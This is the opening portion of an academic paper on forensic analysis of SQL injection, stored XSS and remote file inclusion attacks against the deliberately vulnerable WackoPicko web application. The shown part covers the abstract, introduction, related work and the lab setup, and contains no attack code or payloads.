Computer Forensic Analisys of Some Web Attacks Nataša Šuteva, Aleksandra Mileva Faculty of Computer Science University Goce Delčev Štip, Republic of Macedonia {natasa.suteva, aleksandra.mileva}@ugd.edu.mk Mario Loleski Forensic Department Ministry of Interior of the Republic of Macedonia, Skopje, Republic of Macedonia mario_loleski@moi.gov.mk Abstract—Symantec Internet Security Threat Report 2014 is showing a horrified fact, that when an attacker looked for a site to compromise, one in eight sites made it relatively easy to gain access. Many attackers are arrested due to the evidences obtained by computer forensics. The victim machine usually gives some data, which are then used for identifying possible suspects, which is followed by forensic analysis of their devices, like computers, laptops, tablets, and even smart phones. In this paper, we use an attack scenario on the known vulnerable web application WackoPicko, of three types of attacks: SQL Injection, stored XSS, and remote file inclusion, usually performed by using a web browser. We use post-mortem computer forensic analysis of attacker and victim machine to find some artifacts in them, which can help to identify and possible to reconstruct the attack, and most important to obtain valid evidence which holds in court. We assume that the attacker was careless and did not perform any anti-forensic techniques on its machine. Keywords-Computer Forensics; SQL Injection; File Inclusion; XSS. I. INTRODUCTION Vulnerability scans of public websites carried out in 2013 by Symantec’s Website Vulnerability Assessment Services found that 77 percent of sites contained vulnerabilities, and 16 percent of them were classified as critical vulnerabilities that could allow attackers to access sensitive data, alter the website’s content, or compromise visitors’ computers (Internet Security Threat Report 2014, [1]). The OWASP (Open Web Application Security Project) Top Ten 2013 [2] offers a list of the most critical Web application vulnerabilities, including different types of injection, broken authentication and session management, cross-site scripting, secure misconfiguration, etc. Many organizations lose their reputation or revenue, because of various hackers’ attacks. Today, the cybercrime is a global problem, and the computer forensics is one way to combat it. Computer forensics prepares legal evidences and give answers to many questions of legal systems related to computers. Analyzed forensic images are the primary evidence. We chose to investigate three types of attacks, SQL injection, stored XSS and remote file injection, which are usually conducted through a web browser. We are interested in what kind of post-mortem forensic artifacts can be found after performing attack on the attacker and victim machine. As a tested web application, we use known vulnerable WackoPicko [3], first introduced by Doupe et al. [4]. Also, we assume that the attacker did not perform any anti-forensic techniques (format, wipe etc.) on its machine. We are aware that conducted research is very platform specific, so our results holds for the dominant Apache web server and Backtrack 5 R3 attacker’s machine. But similar artifacts can be also expected on other related attacker/victim platforms, too. We showed that from the three types of attacks, remote file inclusion and use of shells leave many traces on both machines, most of them in log files on the victim and web history in the attacker. After Introduction Section, Section II is devoted to attacking scenario, including a short description of vulnerable web application WackoPicko, and detailed description of three performed attacks SQL injection, stored XSS and remote file inclusion. In Section III we give a brief overview of performed forensic analysis of both machines, followed by discussion of the results and final conclusions. A. Previous work To our knowledge, there are no many papers for forensic investigation of web attacks. Andrade and Gan [5] investigate passive attacks for determination of vulnerabilities of Linux Ubuntu server, using Linux BackTrack 5 tools, including Metasploit, Nessus, Whatweb, Nmap, PHP-Backdoor and Weevely. They use netstat tool and server log files for forensic investigation of the attacks. Good forensics analysis of Linux RAM is given in [6]. Shulman and Waidner [7] show how digital signatures from DNSSEC can be useful in forensic analysis. II. ATTACK SCENARIO For the attack, we use virtual WM Ware machine with installed BackTrack 5 R3 and with IP address 192.168.60.159. A. Vulnerable web application The vulnerable WackoPicko application is a photo sharing and photo-purchasing site. Users of WackoPicko can upload photos, browse other user’s photos, comment on photos, and purchase the rights to a high-quality version of a photo. It has 10 vulnerabilities accessible without authentication (reflected and stored XSS, reflected XSS behind JavaScript, predictable Session ID for admin, weak admin password, reflected SQLI, command line injection, file inclusion, unauthorized file exposure, and parameter manipulation), and 6 vulnerabilities Copyright © 2014 WorldCIS-2014 Technical Co-Sponsored by IEEE UK/RI Computer Chapter 43